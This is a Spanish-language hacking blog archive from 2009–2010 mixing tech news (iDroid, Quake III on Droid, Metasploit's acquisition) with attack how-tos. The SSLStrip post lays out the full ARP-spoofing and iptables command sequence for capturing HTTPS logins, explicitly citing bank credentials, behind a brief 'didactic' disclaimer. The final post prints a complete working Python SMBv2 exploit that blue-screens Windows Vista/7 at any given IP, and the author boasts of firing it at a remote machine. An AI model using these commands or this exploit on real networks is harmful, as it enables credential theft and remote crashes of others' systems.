Mostrando entradas con la etiqueta hacking. Mostrar todas las entradas
Mostrando entradas con la etiqueta hacking. Mostrar todas las entradas

martes, 4 de mayo de 2010

iPhoneLinux / iDroid


(Logo no oficial)

En abril 21 un miembro del conocido iPhone Dev Team mostro al mundo un video donde muestra al OS Android ejecutandose en el hardware de un iPhone 2G.

Hasta el momento solo esta disponible para ese modelo y se esta trabajando para crear ports a los demas modelos.

Actualmente estoy apoyando en el alpha testing para el iPod Touch 2G.

Para mayor información pueden entrar a la pagina ofical del proyecto:

iDroid
Planetbeing blog

Saludos!

jueves, 25 de febrero de 2010

Quake III en Motorola Droid

El 22 de este mes de febrero salio la noticia de que John Carmack va a recibir el premio Lifetime Achievement por parte de Game Developers Choice Awards, esto sera el 11 de marzo, bien merecido para John ya que ha colaborado de una forma impresionante en el desarrollo de video juegos en 3D.

Bueno, gracias a sus desarrollos y que el código de algunos de sus juegos desarrollados por su compañia ID Software estan bajo licencia GPL, ha permitido que varios geeks programadores alrededor del mundo puedan modificar dicho código para crear nuevos juegos o que puedan ser ejecutados en varias plataformas.

Hoy le toco a Droid de Motorola, donde un programador porto el juego de Quake III a este dispositivo, por lo cual si eres Gamer, eres fan de Quake y tienes un Droid, ya la hiciste.

Gracias John Carmack!

[Game Development Choice Awards]

[Página de Proyecto Quake III en Droid]

jueves, 19 de noviembre de 2009

Farmville Auto Click

Ser un Farmville Addict no es fácil, requiere de esfuerzo y dedicación para tener tu Farm en buen estado, la flojera viene cuando tienes demasiados "cuadros" de sembradios y tienes que cosechar, arar y sembrar (clicks, clicks y mas clicks).
Para eso un programador con pseudonimo Sam creo una aplicación que se llama FarmVille Auto Click (FVAClick.exe).
Esta aplicación soluciona todos los problemas antes mencionados por que le indicas cuantos "cuadros" vas a dar click y lo hace automágicamente por ti por lo cual no más sufrimiento para las tareas diarias de FarmVille.
Screenshots



[Download]
Imagenes Obtenidas de aquí
Creditos: Para el Desarrollador de la aplicación.
Enjoy!!!

viernes, 13 de noviembre de 2009

Windows 7 / Server 2008R2 Remote Kernel Crash

¿Recuerdan el exploit que provocaba un BSOD en Windows 7 de Laurent Gaffié?...
Si la respuesta es sí continuen leyendo, si es no, favor de ir aquí.
Pues nuestro amigo Laurent encontró otro fallo en SMB que afecta a Windows 7/ Server 2008 R2 con severidad de medium a high.
El impacto es que un atacante puede remotamente "tronar" cualquier Windows 7/Server 2008R2 dentro de la LAN o via IE (Internet Explorer).
NO hay patch por lo que se recomienda cerrar los puertos que usen SMB.
From Laurent...
"Most secure Os ever";
What ever your firewall is set to, you can get remotly smashed via IE or even via some broadcasting nbns tricks (no user interaction)
How funny.

[Blog de Laurent]

UPDATE: It works!, el PoC lo tienen que modificar un poco, una pizca de Ingenieria Social y listo!, la Windows Machine se Freezea!!! (Pwn3d!):

martes, 27 de octubre de 2009

SSL Strip

This tool provides a demonstration of the HTTPS stripping attacks presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.

Yeah!, un ejemplo básico es que puedes ver el username y password de una página de bancos como CapitolOne :S.

Las instrucciones siguientes seran para Fedora, ya que en la página oficial vienen para Debian based:

Python >= 2.4
yum -y install python

Python "twisted-web"
yum -y install python-twisted-web

Arpspoof
yum -y install dsniff

Setup
tar zxvf sslstrip-0.X.tar.gz
cd sslstrip-0.X
(optional) ./setup.py install


Forwarding mode.
echo "1" > /proc/sys/net/ipv4/ip_forward

Configuramos iptables para dirigir el tráfico HTTP a sslstrip.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port [listenPort]

Ejecutamos sslstrip.
sslstrip.py -l [listenPort]

Ejecutamos arpspoof para que el tráfico sea enviado hacia nuestro equipo.
arpspoof -i [interface] -t [targetIP] [gatewayIP]

Listo, pueden abrir el archivo sslstrip.log para ver las capturas de trafico HTTPS.

Disclaimer: Este post es de cuestiones didacticas para conocer como un atacante puede aprovecharse de un acceso no autorizado a nuestra red y ver el tráfico que va destinado a HTTPS.

[Sitio de SSLStrip]

miércoles, 21 de octubre de 2009

Rapid7 adquiere Metasploit

Metasploit es el framework libre reconocido mundialmente para ejecutar exploits (hack da stuff!) que ha estado alrededor de 6 años en el ambito de la seguridad de tecnologias de información.

Este desarrollo que era solo de fin de semana o tiempo libre por parte de HD Moore y Egipt ahora sera de tiempo completo, pagado por Rapid7.

En horabuena, esperemos que Rapid7 sepa aprovechar el talento del equipo detras de Metasploit y este framework pueda crecer.

Anuncio Metasploit
Anuncio Rapid7

jueves, 15 de octubre de 2009

Problemas con iPod Touch 2G + iPhoneBrowser

Pues si, realice el super upgrade de 3.0 a 3.1.2 del firmware del iPod con jailbreak incluido gracias a la lluv1a negra.

Ahora bien quise cambiar el theme de mi iPod pero me fue imposible ya que iPhoneBrowser no detecta el dispositivo con Jailbreak.

Esto se debe en la forma que realicé el Jailbreak (con lluv1a negra) ya que no se crea un servicio llamado afc2 que necesita tanto el iPhoneBrowser como DiskAid para poder desplegar el árbol del sistema de archivos.

Para agregar este servicio solamente hay de dos, manualmente o por medio de Cydia, esto segundo fue la forma en como lo realice, busque la aplicación afc2add de modmyi.com, la instale y listo!, ya puedo ver de nuevo el sistema de archivos.

Ahora a "pimpear" el iPod con un nuevo theme.

jueves, 1 de octubre de 2009

Assembly Language and SecurityTube

Revisando mis correos me encontre con una interesante discusión en la cual se preguntaba sobre un sitio para aprender lenguaje ensamblador, me llamo la atención una respuesta en la cual mencionan a SecurityTube, el cual es como un YouTube para personas que les interesa la seguridad en IT.

Dentro de esa respuesta se dio la siguiente lista de videos para aprender ensamblador:

1. System Organization Concepts:

http://tinyurl.com/ceq5fy

2. Virtual Memory Basics:

http://tinyurl.com/c7o956

3. GDB Primer:

http://tinyurl.com/cmsvfj

4. Coding your first Hello World program

http://tinyurl.com/dj9fgn

5. Data types in Assembly:

http://tinyurl.com/cs6cy4

6. Moving Data around in a program:

http://tinyurl.com/cmwv3r

7. Working with Strings::

http://tinyurl.com/dlav5f

8. Unconditional Branching techniques:

http://tinyurl.com/djthgy

9. Conditional Branching using the JMP family:

http://tinyurl.com/ce9npc

10. Functions in Assembly

http://tinyurl.com/cy8b9m

11. Understanding the Stack

http://tinyurl.com/dh72ow

Ahora para los que deseen aprender ensamblador, lets get it on!.

Gerix Wifi Cracker New Generation

¿Qué es Gerix Wifi Cracker NG?

Es un GUI para Aircrack-NG para atacar Access Points y Routers Wireless de una forma rápida y sencilla. Otra palabra que le gusta utilizar a un amigo en vez de atacar es auditar...

Esta herramienta esta escrita en Python y QT.

Como dicen en la página del proyecto:

with Gerix WIFI Cracker NG, EVEN MY GRANDMOTHER KNOWS HOW TO CRACK A WIRELESS NETWORK!

con Gerix WIFI Cracker NG, incluso mi abuela sabe como crackear una red wireless

Enjoy!
Página de Gerix

martes, 8 de septiembre de 2009

BSOD en Windows Vista y 7

Si, un "Pantallazo Azul" ataca de nuevo a nuestro fabricante favorito de Software Microsoft.
Se acuerdan de aquel Ping of Death, pues esta falla es más divertida.

Tengo un poco de flojera, asi que posteare lo que encontre en la WEB:

Laurent Gaffié ha detectado un fallo de seguridad en Windows Vista que
podría permitir a un atacante provocar un BSOD (pantallazo azul, una
denegación de servicio) con solo enviar algunos paquetes de red
manipulados a una máquina que tenga activos los servicios de
compartición de archivos (protocolo SMB).

El fallo (incomprensiblemente simple) está en el intérprete de las
cabeceras SMB, concretamente en el driver srv2.sys. Como los
controladores operan en el "ring0", la capa de abstracción del sistema
operativo más cercana al hardware (en contraste con el "ring3", la capa
de usuario que no interactúa directamente con él) un fallo en cualquier
driver provoca que el sistema se bloquee por completo, al no poder
manejar la excepción correctamente. Se trata del temido pantallazo azul,
o BSOD. Los Windows anteriores a Windows 2000 no realizaban esta
separación de seguridad entre capas, por lo que todo operaba en el mismo
espacio de memoria y los fallos en el espacio de usuario podían causar
un bloqueo total del sistema. De ahí que los pantallazos azules fuesen
mucho más comunes en Windows 9x y Me.

El ataque es tan sencillo que recuerda a los "pings de la muerte" que
hicieron estragos a finales de los 90 en los sistemas Windows. Contenían
un fallo en la pila TCP que hacía que, si se enviaba un ping al sistema
especialmente manipulado (simplemente especificando con un parámetro,
por ejemplo, un tamaño mayor del paquete) se podía hacer que el sistema
dejara de responder. Esto, unido a la carencia de cortafuegos del
sistema, a que en aquellos momentos las conexiones se realizaban a
través de módem (que carecía de protección por cortafuegos o NAT) y el
hecho de no existir servicio de actualización automático del sistema,
hicieron muy popular el ataque.

Este fallo en el protocolo SMBv2 de compartición de archivos requiere
igualmente del envío de una sencilla secuencia de paquetes SMB (al
puerto 445) al sistema víctima con las cabeceras manipuladas. El truco
está en enviar un carácter "&" en el campo "Process Id High" de las
cabeceras SMBv2. Esto provoca una excepción en srv2.sys que provoca el
pantallazo azul. El exploit es público y realmente sencillo.

Vista mantiene el cortafuegos activo por defecto para su perfil
"público", y esto mitiga el problema. Pero todo depende del perfil. Si
el usuario usa un perfil de cortafuegos (ya sea de dominio, o el perfil
privado) en el que permite las conexiones a sus unidades compartidas
(puerto 445, normalmente abierto en las redes locales) será vulnerable.
No es necesario que comparta realmente una unidad, solo que el protocolo
SMB esté activo y preparado para compartir en su sistema. Esto puede
resultar especialmente grave en redes internas.

No existe parche oficial disponible. Se recomienda filtrar el puerto 445
(y los implicados también en la compartición de ficheros 137-139) a
través de cortafuegos. También es posible detener el servicio "Servidor"
del sistema (aunque se puede llegar a perder funcionalidad). Otra
contramedida posible es desactivar la casilla "compartir archivos e
impresoras" que aparece en las propiedades de las interfaces de red.

Aunque el ataque no permite ejecución de código y es poco viable que
pueda propagarse por la red pública, sí que puede resultar más que
molesto en redes internas donde los usuarios normalmente mantienen
reglas de cortafuegos mucho más relajadas.


Bueno, despues de tanto yara yara, consegui el código desde el sitio de Laurent, la persona que descubrio la vulnerabilidad; esta en Python y lo modifique un poco para poder poner cualquier IP:
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA

from socket import socket
from time import sleep
import sys

host = sys.argv[1], 445
print 'Trying to Pwn ',host

buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()


Uso: smbbsod.py hostname

Pero para hacerlo más interesante (si, en veces entran los Geek Moments) instale Python en el iPod touch y desde ahi ejecute el script a un equipo remoto con Windows 7 :P, despues pongo una picture.

Fuentes:
Sitio de Laurent Gaffié
Hispasec